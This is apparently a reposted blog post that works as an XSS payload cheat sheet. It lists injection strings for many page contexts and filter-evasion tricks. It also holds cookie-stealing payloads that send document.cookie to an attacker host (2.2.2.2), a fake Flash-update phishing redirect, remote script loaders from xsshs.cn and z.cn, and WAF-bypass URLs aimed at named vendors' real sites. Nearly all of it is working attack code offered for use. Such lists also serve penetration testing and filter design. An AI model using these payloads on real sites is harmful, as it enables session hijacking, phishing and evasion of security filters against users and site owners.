Different XSS payloads
VSole 2022-08-28 06:50:01
Different situations call for different XSS payloads:
Pop-up
<script>alert(1)</script>
<script>prompt(2)</script>
<script>confirm(3)</script>
<script>console.log(3)</script>
<script>document.write(1)</script>
When a pop-up is not possible, the following payloads can be used as proof of execution
<script>console.log(3)</script>
<script>document.write(1)</script>
Loading external JS (a short domain name may be needed when the injection point has a length limit)
<script src=//xsshs.cn></script>
<img src onerror=appendChild(createElement("script")).src="http://xsshs.cn/aaaa">
<img src onerror=jQuery.getScript("http://xsshs.cn/aaaa")>
Stealing cookies
<script>window.location="http://2.2.2.2/?msg="+escape(document.cookie)</script>
<script>document.body.appendChild(document.createElement("img")).src="http://2.2.2.2/?msg="+escape(document.cookie)</script>
(2.2.2.2 is a placeholder for the attacker-controlled collector; the redirect variant navigates the victim away and is noticeable, the image variant exfiltrates silently)
Combining a pop-up with URL redirection for phishing
<script>alert("Your Flash version is out of date, please update your Flash version"); window.location="http://2.2.2.2/"</script>
(the redirect target is the attacker's fake update page; 2.2.2.2 is again a placeholder)
When the XSS trigger point is outside a tag
name=<script>alert(1)</script>
Inside a tag
name="><script>alert(1)</script>
name=1" id=javascript:alert(1) autofocus onfocus=location=this.id xx="
Inside href=
name=javascript:alert(1)
Inside JS
name=</script><script>alert(1)</script>
name=';alert(1)//
name='-alert(1)-'
name=';};alert(1);function a(){a='
Inside XML
<?xml version="1.0"?><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'></a>
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(1);</html:script></html:html>
SVG
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve"> <image id="image0" width="751" height="751" x="0" y="0"
href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" />
<script>alert(1)</script>
</svg>
When parentheses are filtered
<script>alert`1`</script>
<video src onerror=a="%2",location="javascript:aler"+"t"+a+"81"+a+"9">
<video src onerror="javascript:window.onerror=alert;throw 1">
(the second payload assembles javascript:alert%281%29 and the parentheses come back when the URL is decoded; the third makes the browser call alert with the uncaught-error message as its argument)
When spaces are filtered
Assume the payload is as follows:
<html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html>
Position A can be filled with /, /123/, %09, %0A, %0C, %0D, %20
Position B can be filled with %09, %0A, %0C, %0D, %20
Position C can be filled with %0B (vertical tab: JavaScript treats it as whitespace but the HTML tokenizer does not, so it does not end the unquoted attribute value); if the handler value is wrapped in double quotes, /**/, %09, %0A, %0C, %0D, %20 also work
Position D can be filled with %09, %0A, %0C, %0D, %20, //, >
Functions combined with string concatenation
<video/src/onerror=top.alert(1);>
<video/src/onerror=top[`al`+`ert`](1);>
<video/src/onerror=self[`al`+`ert`](1);>
<video/src/onerror=parent[`al`+`ert`](1);>
<video/src/onerror=window[`al`+`ert`](1);>
<video/src/onerror=frames[`al`+`ert`](1);>
<video/src/onerror=content[`al`+`ert`](1);>
<body/onload=eval(alert(1));>
<body/onload=eval(`al`+`ert(1)`);>
<body/onload=open(alert(1));>
<body/onload=document.write(alert(1));>
<body/onload=setTimeout(alert(1));>
<body/onload=setInterval(alert(1));>
<body/onload=Set.constructor(alert(1))()>
<body/onload=Map.constructor(alert(1))()>
<body/onload=Array.constructor(alert(1))()>
<body/onload=WeakSet.constructor(alert(1))()>
<body/onload=constructor.constructor(alert(1))>
<video/src/onerror=[1].map(alert);>
<video/src/onerror=[1].map(eval('al'+'ert'));>
<video/src/onerror=[1].find(alert);>
<video/src/onerror=[1].every(alert);>
<video/src/onerror=[1].filter(alert);>
<video/src/onerror=[1].forEach(alert);>
<video/src/onerror=[1].findIndex(alert);>
Assignment and concatenation
<img src onerror=_=alert,_(1)>
<img src alt=al lang=ert onerror=top[alt+lang](1)>
<img src onerror=top[a='al',b='ev',b+a]('alert(1)')>
<img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>
Creating an anonymous function
<video/src/onerror=Function('ale'+'rt(1)')();>
Pseudo-protocols
<svg/onload=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<form action=javascript:alert(1)><input type=submit>
<a href=javascript:alert(123);>xss</a>
<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object>
<embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">
(in the svg onload case, javascript: is simply a JS label inside the handler, not a URL scheme; the data: URLs loaded in iframe/object/embed run in an opaque origin in modern browsers, so they prove script execution but cannot read the hosting page's cookies or DOM)
Safedog (安全狗)
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=top[`al`%2B`ert`](1);>
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=appendChild(createElement("script")).src="http://z.cn">
D盾 (D Shield)
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[`al`%2B`ert`](1);>
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
Yunsuo (云鎖) + QAX (奇安信) WAF
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[`al`%2B`ert`](1);>
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
Some novel XSS payloads
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<input onfocus=alert(1) autofocus>
<h1 onmousemove="alert(1)">title</h1>
<select onfocus=alert(1) autofocus>
<iframe src="vbscript:msgbox(1)"></iframe>
<iframe src="javascript:alert(1)"></iframe>
<iframe onload=alert(1)></iframe>
<iframe src="data:text/html,<script>alert(0)</script>"></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
</iframe><iframe src="vbscript:msgbox(1)"></iframe>
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe>
<details open ontoggle=prompt(/xss/)>
<plaintext/onmouseover=prompt(1)>
javascript://comment%250aalert(1)
<img src=x onerror=confirm(1)>
<video><source onerror=alert(1)>
<audio src=x onerror="alert(1)">
<body onload=alert(1)>
<body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<textarea onfocus=alert(1) autofocus>
Copyright notice: this article is an original post by CSDN blogger "Redmaple925". Original link: https://blog.csdn.net/songbai220/article/details/120667388
VSole
Cybersecurity expert